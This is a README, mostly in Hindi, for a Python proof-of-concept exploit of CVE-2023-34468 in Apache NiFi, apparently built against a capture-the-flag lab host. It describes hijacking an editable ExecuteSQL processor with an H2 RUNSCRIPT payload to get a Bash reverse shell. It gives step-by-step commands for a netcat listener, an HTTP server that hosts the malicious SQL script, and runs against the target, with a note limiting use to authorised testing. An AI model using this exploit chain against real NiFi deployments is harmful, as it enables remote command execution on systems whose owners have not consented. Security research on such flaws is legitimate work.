
CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC
एक संपादन योग्य Apache NiFi ExecuteSQL प्रोसेसर का दुरुपयोग करने और Bash रिवर्स शेल के माध्यम से रिमोट कमांड निष्पादन ट्रिगर करने के लिए H2 RUNSCRIPT पेलोड के साथ एक छोटा Python PoC।
केवल अधिकृत परीक्षण और शोध के लिए। उन प्रणालियों के विरुद्ध उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास नहीं है।
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
--processor-id स्वीकार करता है।rce.sql पेलोड लिखता है जो Java-आधारित शेल निष्पादन एलियास को परिभाषित और कॉल करता है।nc लिसनर और HTTP सर्वर शुरू करने के लिए संकेत देता है।RUNSCRIPT के माध्यम से rce.sql प्राप्त करने के लिए प्रोसेसर क्वेरी को अपडेट करता है।



git clone https://github.com/ozcanpng/CVE-2023-34468.git
cd CVE-2023-34468
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
टर्मिनल 1:
rlwrap nc -lvnp 4444
टर्मिनल 2, इस रिपॉजिटरी डायरेक्टरी से:
python3 -m http.server 8000
टर्मिनल 3:
python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
मैन्युअल प्रोसेसर चयन के लिए:
python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
| उत्पाद | प्रभावित संस्करण | आवश्यक एक्सेस | प्रभाव |
|---|---|---|---|
| Apache NiFi | CVE-2023-34468 से प्रभावित डिप्लॉयमेंट जो संपादन योग्य ExecuteSQL/H2 व्यवहार का उपयोग करते हैं | API के माध्यम से लक्षित NiFi प्रोसेसर तक पहुँचने और संशोधित करने की क्षमता | रिमोट कमांड निष्पादन |
rce.sql फ़ाइल git द्वारा अनदेखी की जाती है और इसे python3 -m http.server के साथ रिपॉजिटरी डायरेक्टरी से सर्व की जानी चाहिए।--processor-id के साथ प्रोसेसर UUID मैन्युअल रूप से पास करें।ozcanpng — github.com/ozcanpng — ozcanpng.dev